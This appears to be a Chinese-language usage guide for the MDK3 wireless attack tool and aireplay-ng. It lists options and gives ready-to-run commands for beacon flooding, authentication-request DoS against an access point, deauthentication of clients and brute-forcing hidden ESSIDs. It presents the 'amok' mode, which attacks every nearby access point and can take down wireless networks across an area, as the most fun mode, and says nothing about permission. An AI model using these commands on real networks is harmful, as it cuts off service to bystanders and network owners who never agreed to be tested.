####MDK3 是一款无线DOS 攻击测试工具
能够发起BeaconFlood,AuthenticationDoS,Deauthentication/Disassociation Amok等模式的攻击
另外它还具有针对隐藏ESSID 的暴力探测模式、802.1X 渗透测试、WIDS干扰等功能
首先激活无线网卡至监听模式
airmon-ng start wlan0
然后输入
mdk3 --fullhelp
查看详细帮助内容
攻击命令为:
mdk3 <mon0> <参数>
mon0为监听模式的无线网卡,具体使用ifconfig查看
###beacon flood mode:
发射大量死亡ssid来干扰其他使用者
使用
mdk3 --help b #查看详细内容
-n <ssid> #自定义ESSID
-f <filename> #读取ESSID列表文件
-v <filename> #自定义ESSID和BSSID对应列表文件
-d #自定义为Ad-Hoc模式
-w #自定义为wep模式
-g #54Mbit模式
-t # WPA TKIP encryption
-a # WPA AES encryption
-m #读取数据库的mac地址
-c <chan> #自定义信道
-s <pps> #发包速率
使用样例
mdk3 mon0 b -f /root/list.txt -c 6 -s 100
Authentication DoS:
验证请求攻击模式:自动模拟随机产生的mac向目标AP发起大量验证请求,导致AP忙于处理过多的请求而停止对正常连接客户端的响应,迫使AP主人重启路由。(对于新型路由器效果不明显)
mdk3 --help a #查看详细内容
-a <ap_mac> #测试指定BSSID
-m #使用有效数据库中的客户端mac地址
-c #对应 -a ,不检查是否测试成功
-i <ap_mac> #对指定BSSID进行智能攻击
-s <pps> #速率,默认50
使用样例
mdk3 mon0 a -a xx:xx:xx:xx:xx:xx -c -s 100
Deauthentication/Disassociation Amok:
强制解除验证解除连接!在这个模式下,软件会向周围所有可见AP发起循环攻击,可以造成一定范围内的无线网络瘫痪.
//这是最好玩的模式
mdk3 --help d #查看详细内容
-w <filename> #白名单mac地址列表文件
-b <filename> #黑名单mac地址列表文件
-s <pps> #速率
-c [chan,chan,chan,...] #信道,可以多填,如 1,6,11
使用样例
mdk3 mon0 d -s 200 -c 1,6,11
除了MDK3以外,aireplay-ng也能够实现Deauth攻击
-0的意思为采用Deauth攻击(使用-deauth同理)
后跟的参数为发送Deauth包的数量;
-a后的参数为目标AP的MAC地址
具体使用方法可用
aireplay-ng –help
查看
aireplay-ng --deauth 50 -a A8:57:4E:B5:2E:8A wlan0mon
注意:aireplay-ng 进行攻击如上时,只会在wlan0mon监听的信道内寻找目标,所以在进行攻击前,应先用
airodump-ng wlan0mon
寻找目标mac与信道,然后将网卡监听信道调整到目标mac所在信道,
airmon-ng start wlan0 X(代表目标信道)
再执行攻击命令,否则会出现No such BSSID available
###Basic probing and ESSID Bruteforce mode:
探测AP基本信息和ESSID猜解
mdk3 --help p #查看详细信息
-e <ssid> #待检测的ssid
-f <filename> #检测AP设置为隐藏的ssid列表文件
-t <bssid> #用bssid检测AP的信息
-s <pps> #速率,默认300
-b <character set> #设置字符集
使用样例
mdk3 mon0 p -t xx:xx:xx:xx:xx:xx -s 100